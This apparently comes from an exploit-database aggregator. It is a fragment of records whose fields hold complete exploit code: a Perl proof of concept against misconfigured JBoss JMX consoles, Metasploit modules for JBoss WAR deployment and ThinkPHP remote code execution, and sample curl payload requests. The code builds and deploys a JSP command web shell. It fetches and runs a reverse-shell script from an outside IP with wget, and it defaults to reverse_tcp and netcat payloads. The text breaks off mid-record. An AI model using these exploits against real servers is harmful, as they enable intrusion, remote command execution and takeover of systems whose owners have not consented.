"https://packetstormsecurity.com/files/105520/JBoss-addURL-Misconfiguration-Attack.html", "sourceData": "`#!/usr/bin/perl \n# Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner \n# Date: Oct 3 2011 \n# Author: y0ug <at> codsec.com \n# Version: \n# Tested on: Linux \n# CVE : CVE-2010-0738 \n# \n# POC against misconfigured JBoss JMX Console \n# It use the addUrl method in DeploymentScanner module \n# \n# More information \n# http://packetstormsecurity.org/files/download/105479/JBossWhitepaper.pdf \n# http://poc-hack.blogspot.com/2011/02/how-to-hack-any-version-of-jboss.html \n# \n# You need to edit \n# $url_cmd to match the war payload url \n# $url_shell is your reverse shell url \n# ( only if you want to use reverse_shell(\"ip\", \"port\") ) \n# \n# The JSP shell is not mine is available every where \n# I add a -b param that build the war contener to do this you need java \n# \n# Is a fast POC coded this morning for fun so maybe it don't cover all case/version \n# \n# Usage: \n# Build the war contener (need java) \n# ./jboss -b \n# Hack \n# ./jboss http://www.vuln.com:8080 \n \nuse strict; \n \nuse LWP::UserAgent; \nuse HTTP::Request::Common qw(POST); \nuse HTTP::Request::Common qw(GET); \nuse IO::Socket::SSL; \nuse Cwd; \n \n# configuration section \nmy $url_cmd = \"http://78.46.149.64/cmd.war\"; \nmy $url_shell = \"http://78.46.149.64/reverse.pl\"; \nmy $debug = 0; # 1 to switch to debug \nmy $useragent = \"'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) \". \n\"Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)'\"; \n \n# Don't edit from here \nmy $installed = 0; \nmy $url; \n \nmy $ua = LWP::UserAgent->new; \n \n$SIG{INT} = \"sigtrap\"; \n \nsub debug { \nif( $debug ){ \nprint STDERR \"debug: \", @_, \"\\n\"; \n} \n} \n \nsub check_url { \nmy $request = GET \"$url/jmx-console/\"; \nmy $response = $ua->request($request); \nif (!$response->is_success) { \nprint STDERR $response->status_line, \"\\n\"; \nreturn -1; \n} \nreturn 0; \n} \n \nsub sigtrap { \nif ( $installed ){ \nprint \" [*] Clean of $url in progress...\\n\"; \nclean_war(); \n} \nexit 1; \n} \n \nsub find_method_index { \nmy $method = shift(@_); \n \nmy $request = GET \"$url/jmx-console/HtmlAdaptor?\" . \n\"action=inspectMBean&name=jboss.deployment\" . \n\"%3Aflavor%3DURL%2Ctype%3DDeploymentScanner\"; \n \n \nmy $response = $ua->request($request); \nif (!$response->is_success) { \nprint STDERR $response->status_line, \"\\n\"; \nreturn -1; \n} \nmy $page = $response->decoded_content; \n \n# Match a certain jboss version \nwhile ( $page =~ m{<form method=\"post\" action=\"HtmlAdaptor\">(.*?)</form>}sg ){ \nmy $form = $1; \nif ( $form =~ /$method/ ){ \nif ( $form =~ /<input type=\"hidden\" name=\"methodIndex\" value=\"(\\d+)\">/ ){ \ndebug(\"method $method at index $1\"); \nreturn $1; \n} \n} \n} \n \n# Match another jboss version \nwhile ( $page =~ m{<td class='param'>$method</td>(.*?)</tr>}sg ){ \nmy $form = $1; \nif ( $form =~ /<input type='hidden' name='methodIndex' value='(\\d+)'\\/>/ ){ \ndebug(\"method $method at index $1\"); \nreturn $1; \n} \n} \n \n# Match another jboss version \nwhile ( $page =~ m{<span class='aname'>$method</span>(.*?)<table>}sg ){ \nmy $form = $1; \nif ( $form =~ /<input type=\"hidden\" name=\"methodIndex\" value=\"(\\d+)\" \\/>/ ){ \ndebug(\"method $method at index $1\"); \nreturn $1; \n} \n} \nreturn -1; \n} \n \nsub is_installed_war { \nmy $method_index = find_method_index(\"hasURL\"); \nif ( $method_index < 0 ) { print \"Can't find methodIndex for hasURL\\n\"; return -1; } \nmy $request = POST \"$url/jmx-console/HtmlAdaptor\", { action => 'invokeOp', \nname => 'jboss.deployment:type=DeploymentScanner,flavor=URL', \nmethodIndex => \"$method_index\", arg0 => $url_cmd}; \nmy $response = $ua->request($request); \nif (!$response->is_success) { \nprint STDERR $response->status_line, \"\\n\"; \nreturn -1; \n} \nmy $page = $response->decoded_content; \n \nif ( $page =~ m{<pre>(.*?)</pre>}s ){ \nmy $ret = $1; \nif ( $ret =~ /true/ ){ \nreturn 1; \n}else{ \nreturn 0; \n} \n}else{ \nprint STDERR \"error: occured during is_installed_war regex!\\n\"; \nreturn -2; \n} \n} \n \nsub install_war { \nif (is_installed_war == 1){ \nprint \" [*] Install canceled, already installed\\n\"; \nreturn 1; \n} \nmy $method_index = find_method_index(\"addURL\"); \nif ( $method_index < 0 ) { print \"Can't find methodIndex for addURL\\n\"; return -1; } \n \nmy $request = POST \"$url/jmx-console/HtmlAdaptor\", { action => 'invokeOp', \nname => 'jboss.deployment:type=DeploymentScanner,flavor=URL', \nmethodIndex => \"$method_index\", arg0 => $url_cmd}; \nmy $response = $ua->request($request); \nif (!$response->is_success) { \nprint STDERR $response->status_line, \"\\n\"; \nreturn -1; \n} \nmy $page = $response->decoded_content; \n \nif ( $page =~ m{<span class='OpResult'>(.*?)</span>}s ){ \nprint \" [*] \", trim($1), \"\\n\"; \nreturn 0; \n}elsif ( $page =~ m{<pre>(.*?)</pre>}s ){ \nprint \" [*] \", trim($1), \"\\n\"; \nreturn 0; \n}elsif ( $page =~ m{</table>(.*?)</body>}s ){ \nprint \" [*] \", trim($1), \"\\n\"; \nreturn 0; \n}else{ \nprint STDERR \"error: occured during install_war regex!\\n\"; \nreturn -1; \n} \n} \n \nsub clean_war { \nwhile(is_installed_war == 1){ \nif ( uninstall_war() < 0 ){ \nreturn -1; \n} \n} \nprint \" [*] Clean complete\\n\"; \nreturn 0; \n} \n \nsub uninstall_war { \nmy $method_index = find_method_index(\"removeURL\"); \nif ( $method_index < 0 ) { print \"Can't find methodIndex for removeURL\\n\"; return -1; } \nmy $request = POST \"$url/jmx-console/HtmlAdaptor\", { action => 'invokeOp', \nname => 'jboss.deployment:type=DeploymentScanner,flavor=URL', \nmethodIndex => \"$method_index\", arg0 => $url_cmd}; \nmy $response = $ua->request($request); \nif (!$response->is_success) { \nprint STDERR $response->status_line, \"\\n\"; \nreturn -1; \n} \nmy $page = $response->decoded_content; \n \nif ( $page =~ m{<span class='OpResult'>(.*?)</span>}s ){ \nprint \" [*] \", trim($1), \"\\n\"; \nreturn 0; \n}elsif ( $page =~ m{<pre>(.*?)</pre>}s ){ \nprint \" [*] \", trim($1), \"\\n\"; \nreturn 0; \n}elsif ( $page =~ m{</table>(.*?)</body>}s ){ \nprint \" [*] \", trim($1), \"\\n\"; \nreturn 0; \n}else{ \nprint STDERR \"error: occured during uninstall_war regex!\\n\"; \nreturn -1; \n} \n} \n \nsub execute { \nmy $cmd = shift(@_); \nprint '$ ' . $cmd . \"\\n\"; \n \nmy $request = POST \"$url/cmd/cmd.jsp\", { cmd => $cmd}; \nmy $response = $ua->request($request); \nif (!$response->is_success) { \nif ( $response->code == 404 ){ \nprint STDERR \"Command war contener is not installed!\\n\"; \n}else{ \nprint STDERR $response->status_line, \"\\n\"; \n} \nreturn -1; \n} \nmy $page = $response->decoded_content; \n \nmy $content = $page; \n \nif ( $content =~ m{<BR>(.*)</pre>}s ){ \nprint trim($1) . \"\\n\"; \nreturn 0; \n}else{ \nprint STDERR \"error: occured during exec regex!\\n\"; \nreturn -1; \n} \n} \n \nsub reverse_shell { \nmy ($ip, $port) = @_; \nprint \" [*] reverse shell to $ip $port\\n\"; \nmy $cmd = \"wget -O /tmp/a $url_shell\"; \nif ( execute($cmd) < 0 ){ \nreturn -1; \n} \nif ( execute(\"chmod +x /tmp/a\") < 0 ){ \nreturn -1; \n} \nreturn execute(\"/tmp/a $ip $port\"); \n} \n \nsub trim($){ \nmy $string = shift; \n$string =~ s/^\\s+//; \n$string =~ s/\\s+$//; \nreturn $string; \n} \n \nsub setup { \nprint \" [*] Check url $url...\\n\"; \nif ( check_url() < 0 ){ \nprint \"Url $url not available!\\n\"; \nreturn -1; \n} \n \nprint \" [*] Try to install command war contener...\\n\"; \nreturn install_war; \n} \n \nsub check_cmd { \nmy $t = 5; \nfor( my $i = 1; $i <= $t ; ++$i ){ \nmy $request = GET \"$url/cmd/cmd.jsp\"; \nmy $response = $ua->request($request); \nif (!$response->is_success) { \nif ( $response->code != 404 ){ \nprint STDERR $response->status_line, \"\\n\"; \nreturn 0; \n} \nprint(\" [*] check_cmd $i/$t failed\\n\"); \n}else{ \nprint(\" [*] check_cmd $i/$t ok, gogogo!\\n\"); \nreturn 1; \n} \nif ( $i < $t-1) {sleep(15); } \n} \nreturn 0; \n} \n \nsub help { \nprint \"Help\\n\"; \nprint \" - Is a perl shell so you can call perl function\\n\"; \nprint \" > execute(\\\"id\\\") # execute the commande\\n\"; \nprint \" > reverse_shell(\\\"8.8.8.8\\\", \\\"1912\\\") # download your reverse shell and execute it\\n\"; \nprint \" > clean # remove the war contener from the server\\n\"; \nprint \" > check_cmd # loop until command available\\n\"; \nprint \" > install_war # install the war contener from url\\n\"; \nprint \" > exit # clean and quit\\n\"; \nprint \" > exitd # exit without cleaning\\n\"; \n} \n \nsub build_war { \nmy $jsp_file = \"cmd.jsp\"; \nopen( my $jsp_output, '>', $jsp_file ) or \ndie(\"Can't open $jsp_file : $!\"); \n \nprint $jsp_output <<EOF; \n<%@ page import=\"java.util.*,java.io.*\"%> \n<% \n%> \n<HTML><BODY> \nCommands with JSP \n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\"> \n<INPUT TYPE=\"text\" NAME=\"cmd\"> \n<INPUT TYPE=\"submit\" VALUE=\"Send\"> \n</FORM> \n<pre> \n<% \nif (request.getParameter(\"cmd\") != null) { \nout.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\"); \nProcess p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); \nOutputStream os = p.getOutputStream(); \nInputStream in = p.getInputStream(); \nDataInputStream dis = new DataInputStream(in); \nString disr = dis.readLine(); \nwhile ( disr != null ) { \nout.println(disr); \ndisr = dis.readLine(); \n} \n} \n%> \n</pre> \n</BODY></HTML> \nEOF \n \nclose($jsp_output); \n \nmkdir \"WEB-INF\"; \nmy $xml_file = \"WEB-INF/web.xml\"; \nopen( my $xml_output, '>', $xml_file ) or \ndie(\"Can't open $xml_file : $!\"); \nprint $xml_output <<EOF; \n<?xml version=\"1.0\" ?> \n<web-app xmlns=\"http://java.sun.com/xml/ns/j2ee\" \nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxsi:schemaLocation=\"http://java.sun.com/xml/ns/j2ee \nhttp://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd\" \nversion=\"2.4\"> \n<servlet> \n<servlet-name>Command</servlet-name> \n<jsp-file>/cmd.jsp</jsp-file> \n</servlet> \n</web-app> \nEOF \nclose($xml_output); \n \nsystem(\"jar cvf cmd.war WEB-INF/ $jsp_file\"); \nunlink($xml_file); \nunlink($jsp_file); \nrmdir(\"WEB-INF\"); \n \nprint \" [*] War contener is here \", getcwd, \"/cmd.war\\n\"; \nprint \" [*] Upload it to your server and update script url\\n\"; \n} \n \nsub shell { \ndo { \nprint(\"> \"); \nchop($_ = <STDIN>); \nif ( $_ eq \"help\" ) { help(); } \nif ( $_ eq \"exitd\" ) { exit 0; } \nelsif ( $_ ne \"exit\" ){ eval($_); } \nwarn() if $@; \n} while ($_ ne \"exit\"); \n} \n \nif($#ARGV+1 != 1){ \nprint \" [*] Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner\\n\"; \nprint \" [*] Date: Oct 3 2011\\n\"; \nprint \" [*] Author: y0ug <at> codsec.com\\n\"; \nprint \" [*] Version: 0.1\\n\"; \nprint \" [*] JSP shell url $url_cmd\\n\\n\"; \nprint \" [*] Usage:\\n\"; \nprint \" Build the war contener (need java)\\n\"; \nprint \" $0 -b\\n\"; \nprint \" Hack\\n\"; \nprint \" $0 http://www.vuln.com:8080\\n\\n\"; \n \n \nexit 1; \n} \n \nif($ARGV[0] eq \"-b\"){ \nbuild_war; \nexit 0; \n} \n \n$url = $ARGV[0]; \n \n$ua->agent($useragent); \n \nprint \" [*] JSP shell url $url_cmd\\n\"; \n \nif ( setup() < 0 ){ \nprint \" [*] Setup failed!\\n\"; \nexit 1; \n} \n$installed = 1; \nprint \" [*] Wait few minutes, times to JBoss to load the url\\n\"; \nprint \" [*] You can find the shell here too\\n\"; \nprint \" [*] $url/cmd/cmd.jsp\\n\"; \n \nif ( check_cmd() <= 0 ){ \nprint \" [*] ## Exploit certainly failed! ##\\n\"; \nprint \" [*] You can wait a little longer (run > check_cmd)\\n\"; \n}else{ \nprint \" [*] Congrats, is up!\\n\"; \nexecute(\"id\"); \n} \n \nshell(); \n \nprint \" [*] Clean of $url in progress...\\n\"; \nclean_war(); \n \nexit(0); \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/105520/jboss-addurl.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:18:11", "description": "", "cvss3": {}, "published": "2010-06-24T00:00:00", "type": "packetstorm", "title": "JBoss JMX Console Beanshell Deployer WAR Upload And Deployment", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0738"], "modified": "2010-06-24T00:00:00", "id": "PACKETSTORM:90957", "href": "https://packetstormsecurity.com/files/90957/JBoss-JMX-Console-Beanshell-Deployer-WAR-Upload-And-Deployment.html", "sourceData": "`## \n# $Id: jboss_bshdeployer.rb 9596 2010-06-23 22:25:03Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'JBoss JMX Console Beanshell Deployer WAR upload and deployment', \n'Description' => %q{ \nThis module can be used to install a WAR file payload on JBoss servers that have \nan exposed \"jmx-console\" application. The payload is put on the server by \nusing the jboss.system:BSHDeployer's createScriptDeployment() method. \n}, \n'Author' => [ 'Patrick Hof', 'jduck' ], \n'License' => BSD_LICENSE, \n'Version' => '$Revision: 9596 $', \n'References' => \n[ \n[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST \n[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ] \n], \n'Privileged' => true, \n'Platform' => [ 'windows', 'linux' ], \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Targets' => \n[ \n[ 'Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Payload' => \n{ \n'DisableNops' => true, \n}, \n} \n], \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('USERNAME', [ false, 'The username to authenticate as' ]), \nOptString.new('PASSWORD', [ false, 'The password for the specified username' ]), \nOptString.new('SHELL', [ false, 'The system shell to use', 'automatic' ]), \nOptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]), \nOptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]), \nOptString.new('PATH', [ true, 'The URI path of the JMX console', '/jmx-console' ]), \nOptString.new('VERB', [ true, 'The HTTP verb to use (for CVE-2010-0738)', 'POST' ]), \n], self.class) \nend \n \n \ndef exploit \ndatastore['BasicAuthUser'] = datastore['USERNAME'] \ndatastore['BasicAuthPass'] = datastore['PASSWORD'] \n \njsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8)) \napp_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8)) \n \nverb = datastore['VERB'] \nif (verb != 'GET' and verb != 'POST') \nverb = 'HEAD' \nend \n \np = payload \nif datastore['SHELL'] == 'automatic' \nif not (plat = detect_platform()) \nraise RuntimeError, 'Unable to detect platform!' \nend \n \ncase plat \nwhen 'linux' \ndatastore['SHELL'] = '/bin/sh' \nwhen 'win' \ndatastore['SHELL'] = 'cmd.exe' \nend \n \nprint_status(\"SHELL set to #{datastore['SHELL']}\") \n \n# Payload generation already happened, therefore SHELL will \n# already be 'automatic' in the payload regardless of what we set above. \n# To fix this, we regenerate the payload now.. \nreturn if ((p = regenerate_payload(platform, target_arch)) == nil) \nend \n \n# The following Beanshell script will write the exploded WAR file to the deploy/ \n# directory \nencoded_payload = [p.encoded].pack('m').gsub(/\\n/, '') \nbsh_script = <<-EOT \nimport java.io.FileOutputStream; \nimport sun.misc.BASE64Decoder; \n \nString val = \"#{encoded_payload}\"; \n \nBASE64Decoder decoder = new BASE64Decoder(); \nString jboss_home = System.getProperty(\"jboss.server.home.dir\"); \nnew File(jboss_home + \"/deploy/#{app_base + '.war'}\").mkdir(); \nbyte[] byteval = decoder.decodeBuffer(val); \nString jsp_file = jboss_home + \"/deploy/#{app_base + '.war/' + jsp_name + '.jsp'}\"; \nFileOutputStream fstream = new FileOutputStream(jsp_file); \nfstream.write(byteval); \nfstream.close(); \nEOT \n \n# \n# UPLOAD \n# \nprint_status(\"Creating exploded WAR in deploy/#{app_base}.war/ dir via BSHDeployer\") \nres = invoke_bshscript(bsh_script, verb) \nif !res \nraise RuntimeError, \"Unable to deploy WAR [No Response]\" \nend \nif (res.code < 200 || res.code >= 300) \ncase res.code \nwhen 401 \nprint_error(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") \nend \nraise RuntimeError, \"Upload to deploy WAR [#{res.code} #{res.message}]\" \nend \n \n# \n# EXECUTE \n# \nuri = '/' + app_base + '/' + jsp_name + '.jsp' \nprint_status(\"Executing #{uri}...\") \n \n# JBoss might need some time for the deployment. Try 5 times at most and \n# wait 3 seconds inbetween tries \nnum_attempts = 5 \nnum_attempts.times { |attempt| \nres = send_request_cgi({ \n'uri' => uri, \n'method' => verb \n}, 20) \n \nmsg = nil \nif (! res) \nmsg = \"Execution failed on #{uri} [No Response]\" \nelsif (res.code < 200 or res.code >= 300) \nmsg = \"Execution failed on #{uri} [#{res.code} #{res.message}]\" \nelsif (res.code == 200) \nprint_good(\"Successfully triggered payload at '#{uri}'\") \nbreak \nend \n \nif (attempt < num_attempts - 1) \nmsg << \", retrying in 3 seconds...\" \nprint_error(msg) \n \nselect(nil, nil, nil, 3) \nelse \nprint_error(msg) \nend \n} \n \n# \n# DELETE \n# \n# The WAR can only be removed by physically deleting it, otherwise it \n# will get redeployed after a server restart. \nbsh_script = <<-EOT \nString jboss_home = System.getProperty(\"jboss.server.home.dir\"); \nnew File(jboss_home + \"/deploy/#{app_base + '.war/' + jsp_name + '.jsp'}\").delete(); \nnew File(jboss_home + \"/deploy/#{app_base + '.war'}\").delete(); \nEOT \n \nprint_status(\"Undeploying #{uri} by deleting the WAR file via BSHDeployer...\") \nres = invoke_bshscript(bsh_script, verb) \nif !res \nprint_error(\"WARNING: Unable to remove WAR [No Response]\") \nend \nif (res.code < 200 || res.code >= 300) \nprint_error(\"WARNING: Unable to remove WAR [#{res.code} #{res.message}]\") \nend \n \nhandler \nend \n \n# Try to autodetect the target platform \ndef detect_platform() \nprint_status(\"Attempting to automatically detect the platform...\") \n \npath = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo' \nres = send_request_raw( \n{ \n'uri' => path \n}, 20) \n \nif (not res) or (res.code != 200) \nprint_error(\"Failed: Error requesting #{path}\") \nreturn nil \nend \n \nif (res.body =~ /<td.*?OSName.*?(Linux|Windows).*?<\\/td>/m) \nos = $1 \nif (os =~ /Linux/i) \nreturn 'linux' \nelsif (os =~ /Windows/i) \nreturn 'win' \nend \nend \nnil \nend \n \n \n# Invokes +bsh_script+ on the JBoss AS via BSHDeployer \ndef invoke_bshscript(bsh_script, verb) \nparams = 'action=invokeOpByName' \nparams << '&name=jboss.deployer:service=BSHDeployer' \nparams << '&methodName=createScriptDeployment' \nparams << '&argType=java.lang.String' \nparams << '&arg0=' + Rex::Text.uri_encode(bsh_script) \nparams << '&argType=java.lang.String' \nparams << '&arg1=' + rand_text_alphanumeric(8+rand(8)) + '.bsh' \n \nif (verb == \"POST\") \nres = send_request_cgi({ \n'method' => verb, \n'uri' => datastore['PATH'] + '/HtmlAdaptor', \n'data' => params \n}) \nelse \nres = send_request_cgi({ \n'method' => verb, \n'uri' => datastore['PATH'] + '/HtmlAdaptor?' + params \n}) \nend \nres \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/90957/jboss_bshdeployer.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2023-08-09T16:59:44", "description": "This Metasploit module exploits one of two PHP injection vulnerabilities in the ThinkPHP web framework to execute code as the web user. Versions up to and including 5.0.23 are exploitable, though 5.0.23 is vulnerable to a separate vulnerability. The module will automatically attempt to detect the version of the software. Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "zdt", "title": "ThinkPHP 5.0.23 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20062", "CVE-2019-9082"], "modified": "2020-04-15T00:00:00", "id": "1337DAY-ID-34238", "href": "https://0day.today/exploit/description/34238", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ThinkPHP Multiple PHP Injection RCEs',\n 'Description' => %q{\n This module exploits one of two PHP injection vulnerabilities in the\n ThinkPHP web framework to execute code as the web user.\n\n Versions up to and including 5.0.23 are exploitable, though 5.0.23 is\n vulnerable to a separate vulnerability. The module will automatically\n attempt to detect the version of the software.\n\n Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.\n },\n 'Author' => [\n # Discovery by unknown threaty threat actors\n 'wvu' # Module\n ],\n 'References' => [\n # https://www.google.com/search?q=thinkphp+rce, tbh\n ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP\n ['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']\n ],\n 'DisclosureDate' => '2018-12-10', # Unknown discovery date\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n ['Unix Command',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}\n ],\n ['Linux Dropper',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :curl,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n # NOTE: You may want to tweak this for long-running commands like find(1)\n OptFloat.new('CmdOutputTimeout',\n [true, 'Timeout for cmd/unix/generic output', 3.5])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n=begin\n wvu@kharak:~$ curl -vs \"http://127.0.0.1:8080/index.php?s=$((RANDOM))\" | xmllint --html --xpath 'substring-after(//div[@class = \"copyright\"]/span[1]/text(), \"V\")' -\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)\n > GET /index.php?s=1353 HTTP/1.1\n > Host: 127.0.0.1:8080\n > User-Agent: curl/7.54.0\n > Accept: */*\n >\n < HTTP/1.1 404 Not Found\n < Date: Mon, 13 Apr 2020 06:42:15 GMT\n < Server: Apache/2.4.25 (Debian)\n < X-Powered-By: PHP/7.2.5\n < Content-Length: 7332\n < Content-Type: text/html; charset=utf-8\n <\n { [7332 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n 5.0.20wvu@kharak:~$\n=end\n def check\n # An unknown route will trigger the ThinkPHP copyright with version\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {'s' => rand_text_alpha(8..42)}\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check request.')\n end\n\n unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)\n return CheckCode::Unknown(\n 'Target did not respond with ThinkPHP copyright.'\n )\n end\n\n # Get the first copyright <span> containing the version\n version = res.get_html_document.at('//div[@class = \"copyright\"]/span')&.text\n\n unless (version = version.scan(/^V([\\d.]+)$/).flatten.first)\n return CheckCode::Detected(\n 'Target did not respond with ThinkPHP version.'\n )\n end\n\n # Make the parsed version a comparable ivar for automatic exploitation\n @version = Gem::Version.new(version)\n\n if @version <= Gem::Version.new('5.0.23')\n return CheckCode::Appears(\"ThinkPHP #{@version} is a vulnerable version.\")\n end\n\n CheckCode::Safe(\"ThinkPHP #{@version} is NOT a vulnerable version.\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n # This is just extra insurance in case I screwed up the check method\n unless @version\n fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')\n end\n\n print_status(\"Targeting ThinkPHP #{@version} automatically\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n # XXX: Only opts[:noconcat] may induce responses from the server\n execute_cmdstager\n else # This is just extra insurance in case I screwed up the info hash\n fail_with(Failure::NoTarget, \"Could not select target #{target['Type']}\")\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n if @version < Gem::Version.new('5.0.23')\n exploit_less_than_5_0_23(cmd)\n elsif @version == Gem::Version.new('5.0.23')\n exploit_5_0_23(cmd)\n else # This is just extra insurance in case I screwed up the exploit method\n fail_with(Failure::NoTarget, \"Could not target ThinkPHP #{@version}\")\n end\n end\n\n=begin\n wvu@kharak:~$ curl -gvs \"http://127.0.0.1:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id\" | head -1\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)\n > GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1\n > Host: 127.0.0.1:8080\n > User-Agent: curl/7.54.0\n > Accept: */*\n >\n < HTTP/1.1 200 OK\n < Date: Mon, 13 Apr 2020 06:43:45 GMT\n < Server: Apache/2.4.25 (Debian)\n < X-Powered-By: PHP/7.2.5\n < Vary: Accept-Encoding\n < Transfer-Encoding: chunked\n < Content-Type: text/html; charset=UTF-8\n <\n { [60 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n uid=33(www-data) gid=33(www-data) groups=33(www-data)\n wvu@kharak:~$\n=end\n def exploit_less_than_5_0_23(cmd)\n # XXX: The server may block on executing our payload and won't respond\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 's' => '/Index/\\\\think\\\\app/invokefunction',\n 'function' => 'call_user_func_array',\n 'vars[0]' => 'system', # TODO: Debug ARCH_PHP\n 'vars[1][]' => cmd\n },\n 'partial' => true\n }, datastore['CmdOutputTimeout'])\n\n return unless res && res.code == 200\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n\n return unless datastore['PAYLOAD'] == 'cmd/unix/generic'\n\n # HACK: Print half of the doubled-up command output\n vprint_line(res.body[0, res.body.length / 2])\n end\n\n=begin\n wvu@kharak:~$ curl -vsd \"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id\" http://127.0.0.1:8081/index.php?s=captcha | head -1\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)\n > POST /index.php?s=captcha HTTP/1.1\n > Host: 127.0.0.1:8081\n > User-Agent: 